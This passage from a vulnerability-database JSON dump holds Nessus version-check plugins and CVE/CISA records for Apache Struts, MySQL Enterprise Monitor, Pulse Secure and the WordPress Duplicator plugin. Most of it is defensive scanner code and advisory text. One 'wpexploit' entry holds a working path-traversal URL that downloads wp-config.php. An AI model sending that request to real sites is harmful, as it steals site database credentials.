(CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-059\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.22 or later or apply the workarounds as referenced in in the vendor security\nbulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nwin_local = FALSE;\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os)) win_local = TRUE;\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.20', 'fixed_version' : '2.5.22' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:08:15", "description": "MySQL Enterprise Monitor installed on the remote host is 8.0.x prior to 8.0.24. Therefore, it's affected by multiple vulnerabilities as referenced in the April 2021 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Tomcat)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Enterprise Monitor accessible data (CVE-2020-17527).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Struts)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. 
Successful attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor (CVE-2020-17530).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (OpenSSL)).\n Supported versions that are affected are 8.0.23 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Enterprise Monitor accessible data as well as unauthorized access to critical data or complete access to all MySQL Enterprise Monitor accessible data (CVE-2021-3450).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-04-26T00:00:00", "type": "nessus", "title": "Oracle MySQL Enterprise Monitor Multiple Vulnerabilities (Apr 2021 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17527", "CVE-2020-17530", "CVE-2021-23841", "CVE-2021-25122", "CVE-2021-3450"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_8_0_24.NASL", "href": "https://www.tenable.com/plugins/nessus/148986", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148986);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-17527\",\n \"CVE-2020-17530\",\n \"CVE-2021-3450\",\n \"CVE-2021-23841\",\n \"CVE-2021-25122\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle MySQL Enterprise Monitor Multiple Vulnerabilities (Apr 2021 CPU)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"MySQL Enterprise Monitor installed on the remote host is 8.0.x prior to 8.0.24. Therefore, it's affected by \nmultiple vulnerabilities as referenced in the April 2021 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General \n (Apache Tomcat)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to\n all MySQL Enterprise Monitor accessible data (CVE-2020-17527).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General \n (Apache Struts)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability \n allows unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. Successful\n attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor (CVE-2020-17530).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (OpenSSL)).\n Supported versions that are affected are 8.0.23 and prior. Difficult to exploit vulnerability allows \n unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. 
Successful attacks\n of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or \n all MySQL Enterprise Monitor accessible data as well as unauthorized access to critical data or complete access \n to all MySQL Enterprise Monitor accessible data (CVE-2021-3450).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpuapr2021cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpujul2021cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2021.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2021 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\", \"oracle_mysql_enterprise_monitor_local_nix_detect.nbin\", \"oracle_mysql_enterprise_monitor_local_detect.nbin\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'MySQL Enterprise Monitor');\nvar constraints = [{ 'min_version' : '8.0', 'fixed_version' : '8.0.24' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:39", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to 9.1R9. It is, therefore, affected by multiple vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. 
(CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R9 (SA44601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2019-11358", "CVE-2020-15352", "CVE-2020-8255", "CVE-2020-8260", "CVE-2020-8261", "CVE-2020-8262", "CVE-2020-8263"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44601.NASL", "href": "https://www.tenable.com/plugins/nessus/142058", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142058);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2019-11358\",\n \"CVE-2020-8255\",\n \"CVE-2020-8260\",\n \"CVE-2020-8261\",\n \"CVE-2020-8262\",\n \"CVE-2020-8263\",\n \"CVE-2020-15352\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0495\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R9 (SA44601)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior \nto 9.1R9. 
It is, therefore, affected by multiple vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated\n attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary\n cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true,\n {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8260\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN gzip RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# full ver from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/9.1r9\nconstraints = [\n {'fixed_version':'9.1.9.9189', 'fixed_display':'9.1R9'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xss':TRUE}\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:39", "description": "According to its self-reported version, the version of Pulse Policy Secure running on the remote host is prior to 9.1R9. It is, therefore, affected by the following vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection. 
(CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "Pulse Policy Secure < 9.1R9 (SA44601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2019-11358", "CVE-2020-15352", "CVE-2020-8255", "CVE-2020-8260", "CVE-2020-8261", "CVE-2020-8262", "CVE-2020-8263"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_policy_secure"], "id": "PULSE_POLICY_SECURE-SA44601.NASL", "href": "https://www.tenable.com/plugins/nessus/142057", "sourceData": "##\n# (c) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142057);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2019-11358\",\n \"CVE-2020-8255\",\n \"CVE-2020-8260\",\n \"CVE-2020-8261\",\n \"CVE-2020-8262\",\n \"CVE-2020-8263\",\n \"CVE-2020-15352\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0495\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Pulse Policy Secure < 9.1R9 (SA44601)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Policy Secure running on the remote host is prior to\n9.1R9. 
It is, therefore, affected by the following vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated\n attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary\n cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true,\n {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Policy Secure version 9.1R9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8260\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN gzip RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_policy_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_policy_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Policy Secure\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Policy Secure', port:443);\n\nconstraints = [\n {'fixed_version':'9.1R9'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xss':TRUE}\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-15T22:04:18", "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. 
According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.\n", "cvss3": {}, "published": "2020-02-19T00:00:00", "type": "wpexploit", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2021-01-04T06:01:37", "id": "WPEX-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "", "sourceData": "http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "prion": [{"lastseen": "2023-08-16T10:15:27", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-13T22:15:00", "type": "prion", "title": "CVE-2020-11738", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": 
"2022-10-05T16:54:00", "id": "PRION:CVE-2020-11738", "href": "https://kb.prio-n.com/vulnerability/CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-16T10:15:12", "description": "An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-17T17:15:00", "type": "prion", "title": "CVE-2020-11698", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11698"], "modified": "2022-04-28T18:33:00", "id": "PRION:CVE-2020-11698", "href": "https://kb.prio-n.com/vulnerability/CVE-2020-11698", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T04:53:48", "description": "The fix issued for CVE-2020-17530 was incomplete. 
So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T16:15:00", "type": "prion", "title": "Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-07-25T18:15:00", "id": "PRION:CVE-2021-31805", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Pulse Connect Secure contains an unspecified vulnerability that allows an authenticated attacker to perform code execution using uncontrolled gzip extraction.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Ivanti Pulse Connect Secure Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-8260", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "WordPress Snap Creek Duplicator plugin contains a file download vulnerability when an administrator creates a new copy of their site that allows an attacker to download the generated files from their Wordpress dashboard. 
This vulnerability affects Duplicator and Dulplicator Pro.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "WordPress Snap Creek Duplicator Plugin File Download Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-11738", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Forced Object-Graph Navigation Language (OGNL) evaluation in Apache Struts, when evaluated on raw user input in tag attributes, can lead to remote code execution.", 